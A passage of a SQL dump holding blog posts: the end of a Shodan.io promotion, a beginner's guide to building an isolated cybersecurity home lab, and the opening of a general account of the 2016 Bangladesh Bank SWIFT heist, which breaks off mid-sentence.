my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Efficiency</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By automating the discovery of vulnerabilities and network mapping, organizations save valuable time and resources.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Broader Insights</strong></b></li>\r\n</ol>\r\n<p class=\"text-body 
font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Exploring IoT device vulnerabilities and geolocating connected devices provides a more comprehensive understanding of digital infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Unlock the Full Potential of Shodan.io</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With cyber threats becoming more sophisticated, tools like Shodan.io are essential for maintaining strong defenses. This powerful search engine is more than just a reconnaissance tool—it’s a gateway to better understanding and protecting our increasingly connected world.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explore the possibilities Shodan.io offers for your organization today, and ensure that your cybersecurity infrastructure is one step ahead of threat actors.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Looking for more on cybersecurity tools?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Dive deeper into cybersecurity strategies and innovations with our blog, and don’t forget to subscribe for the latest insights straight to your inbox!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:49:43', '2026-01-12 21:41:44', 'OSINT Tool', 'Exploring Shodan.io: A Powerful Tool in Cybersecurity', '', NULL),
(126, 'How to Set Up a Cybersecurity Home Lab', 'how-to-set-up-a-cybersecurity-home-lab', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to get hands-on experience in cybersecurity? Setting up a cybersecurity home lab is one of the most effective ways to practice penetration testing, explore vulnerability assessment, and hone your skills—all in a safe and controlled environment. Whether you\'re a beginner or an experienced professional looking to expand your expertise, a home lab gives you the freedom to simulate real-world scenarios and experiment without any risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will walk you through what you need to know about setting up a simple yet effective cybersecurity home lab. From understanding the essential components to step-by-step instructions and practical exercises, you\'ll discover how to maximize the learning potential of your lab.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Cybersecurity Home Lab?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity home lab is a personal setup where you can safely simulate, explore, and address cybersecurity challenges. These labs typically involve isolated networks and devices intentionally configured to allow you to test vulnerabilities and experiment with security measures.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The primary purpose of a cybersecurity home lab is to provide hands-on experience. 
It helps you practice critical skills like penetration testing, vulnerability scanning, and firewall configuration—factors that are essential to becoming proficient in cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Set Up a Cybersecurity Home Lab?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are numerous benefits to creating a cybersecurity home lab:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Practice Skills Safely</strong></b>: It gives you a risk-free environment—it won’t compromise any live systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Customizable Setup</strong></b>: Tailor your lab to meet your learning objectives or simulate specific challenges.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Learn Current Tools</strong></b>: Experiment with industry-standard tools like Metasploit, Nessus, and Splunk to stay updated and competitive in your field.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Prepare for Real-World Scenarios</strong></b>: Simulate real-world attacks and learn how to develop effective countermeasures.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Enhance Your Resume</strong></b>: Whether you\'re preparing for certifications or applying for cybersecurity positions, hands-on lab experience is a valuable skill.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now, let\'s look at how to build your lab step-by-step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Components of a Cybersecurity Home Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before getting started, it\'s essential to understand the key components you\'ll need:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Attack Device</strong></b>: A laptop or desktop equipped with <b><strong class=\"font-bold\">Kali Linux</strong></b>. 
This operating system is preloaded with powerful penetration testing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Vulnerable Devices</strong></b>: Devices intentionally configured with vulnerabilities, such as <b><strong class=\"font-bold\">Metasploitable</strong></b>, <b><strong class=\"font-bold\">DVWA (Damn Vulnerable Web Application)</strong></b>, or <b><strong class=\"font-bold\">OWASP Broken Web Applications</strong></b>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Router</strong></b>: A device to manage traffic and securely connect different networks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Firewall</strong></b>: A software or hardware solution that controls traffic between networks, improving security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Monitoring Tools (Optional)</strong></b>: Tools like <b><strong class=\"font-bold\">Splunk</strong></b> or <b><strong class=\"font-bold\">ELK Stack</strong></b> for tracking and analyzing network activity in real time.</li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Setting Up Your Network Environment</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your home lab should consist of three main components:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] 
list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Isolated Network</strong></b>: Contains the vulnerable devices and attack device. This network won\'t affect your personal or home devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Home Network</strong></b>: Includes laptops, mobile devices, or other everyday internet-enabled hardware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Firewall and Router</strong></b>: Acts as a gateway between the isolated network, home network, and the internet, ensuring proper configuration and safety.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Network Diagram Overview</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To ensure optimal understanding and setup, use a network diagram as a visual guideline. 
A basic layout should include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">An isolated network for vulnerable devices and testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">A home network for personal use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">A firewall/router connecting the two to the internet securely.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Guide to Setting Up a Cybersecurity Home Lab</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Setting Up the Isolated Network</h3>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Hardware:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use a physical router or create a virtual network using software like <b><strong class=\"font-bold\">VMware</strong></b> or <b><strong class=\"font-bold\">VirtualBox</strong></b>. 
Virtual networks provide flexibility and cost-efficiency by allowing you to create multiple isolated environments within a single machine.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Attack Device:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Install <b><strong class=\"font-bold\">Kali Linux</strong></b> on your attack device. This open-source platform includes hundreds of tools specifically designed for penetration testing and digital forensics.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerable Devices:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Deploy virtual machines (VMs) with deliberately insecure systems. 
Popular options include:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Metasploitable</strong></b>: Mimics real-world vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">DVWA</strong></b> (Damn Vulnerable Web Application): A web-based platform for testing security skills.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">OWASP Broken Web Applications</strong></b>: A collection of vulnerable web apps.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Configuring the Router and Firewall</h3>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Router:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Ensure your router supports multiple networks using <b><strong class=\"font-bold\">VLANs (Virtual Local Area Networks)</strong></b> or use multiple routers. 
VLANs allow segmentation of network traffic, boosting security and performance.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Firewall:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Place the firewall between your router and the internet. Use hardware-based options or software firewalls like <b><strong class=\"font-bold\">pfSense</strong></b>. Configure it to allow traffic from both your home and isolated network while blocking unnecessary connections.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Connecting the Home Network</h3>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Home Devices:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Connect personal devices (e.g., laptops, smartphones) to the home network. 
Ensure they remain entirely segregated from the isolated environment.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Separation:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Maintain separation between the two networks through VLANs, separate routers, or other segmentation tools. This protects your personal devices from vulnerabilities in your isolated network.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Exercises for Cybersecurity Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once your lab is operational, you can perform several exercises to develop your skills further:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Penetration Testing</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using tools like <b><strong class=\"font-bold\">Metasploit</strong></b>, <b><strong class=\"font-bold\">Nmap</strong></b>, and <b><strong class=\"font-bold\">Wireshark</strong></b>, explore the vulnerabilities in your isolated network. 
Practice identifying weaknesses and simulating exploitation scenarios.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerability Assessment</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Run scans with tools like <b><strong class=\"font-bold\">OpenVAS</strong></b> or <b><strong class=\"font-bold\">Nessus</strong></b> to generate detailed reports on vulnerabilities. Learn about potential risks and mitigation strategies to strengthen defenses.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Firewall Configuration</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Play around with firewall rules using tools like <b><strong class=\"font-bold\">pfSense</strong></b>. Simulate attacks to see how your firewall responds and fine-tune settings for enhanced security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Advanced Scenarios (Optional)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Simulate Real-World Attacks</strong></b>: Recreate phishing attacks, SQL injection, or cross-site scripting (XSS) to understand both offensive and defensive approaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigate Vulnerabilities</strong></b>: After identifying risks, practice 
implementing countermeasures such as patches or improved configurations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Monitoring and Logging</strong></b>: Set up logging solutions like <b><strong class=\"font-bold\">Splunk</strong></b> or <b><strong class=\"font-bold\">ELK Stack</strong></b> to detect and respond to unusual activity in real time.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips for Ethical Hacking</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While practicing, it\'s crucial to adhere to ethical standards:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Only experiment in environments where you have permission.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Never use your skills on live systems or networks without explicit authorization.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update and patch the software in your home lab to avoid leaving it vulnerable.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity home lab is an invaluable resource for anyone aspiring 
to master cybersecurity. By simulating real-world scenarios in a controlled environment, you\'ll sharpen your skills, boost your confidence, and prepare to tackle professional challenges.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to take your lab to the next level? Start experimenting with advanced features like security monitoring, penetration testing frameworks, and even developing your own attack scripts. With time and consistent effort, your home lab could become the stepping stone to an exciting and rewarding career in cybersecurity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that you\'ve learned how to set up your home lab, it’s time to get started! Remember, practice makes perfect—and there\'s no better way to hone your skills than by experimenting in your own secure environment. Happy hacking!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:46:15', '2026-01-12 21:41:44', 'Network Security', 'How to Set Up a Cybersecurity Home Lab', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(127, 'The Bangladesh Bank Heist: How Cybercriminals Exposed Vulnerabilities in Global Banking', 'the-bangladesh-bank-heist-how-cybercriminals-exposed-vulnerabilities-in-global-banking', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">In February 2016, the world was gripped by one of the most daring and sophisticated digital heists in history. Cybercriminals targeted the Bangladesh Bank and attempted to steal $1 billion. This incident shook the global financial system and highlighted the pressing need for stronger cybersecurity measures in banking. Let\'s take a closer look at this landmark cybercrime, how it unfolded, and the key lessons it taught the financial world.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How the Hackers Exploited the SWIFT Network</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">At the heart of this heist was the SWIFT (Society for Worldwide Interbank Financial Telecommunication) network, a critical messaging system used globally by financial institutions to securely transmit transaction instructions. The attackers exploited vulnerabilities within this system to carry out their plan.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Breakdown of the Attack</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Bangladesh Bank heist was a textbook example of meticulous planning and execution. 
Here’s how it all played out:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network Infiltration</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The attackers likely used a combination of social engineering tactics and malware to gain unauthorized access to Bangladesh Bank’s internal networks.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stealing SWIFT Credentials</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once inside the network, the hackers obtained SWIFT credentials, allowing them to initiate transactions that appeared completely legitimate.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Timing the Heist</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The attack was strategically timed to occur over a weekend when the bank was closed. 
This minimized the risk of immediate detection.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Bypassing Verification Protocols</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The criminals exploited weaknesses in the SWIFT network\'s security protocols, bypassing standard verification measures to initiate fraudulent transactions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Their ultimate goal? To siphon off $1 billion. However, the full scale of their plan was not realized, thanks to an unexpected disruption.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Irony in Prevention: The Role of a Printer Error</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A technical glitch became one of the most unexpected 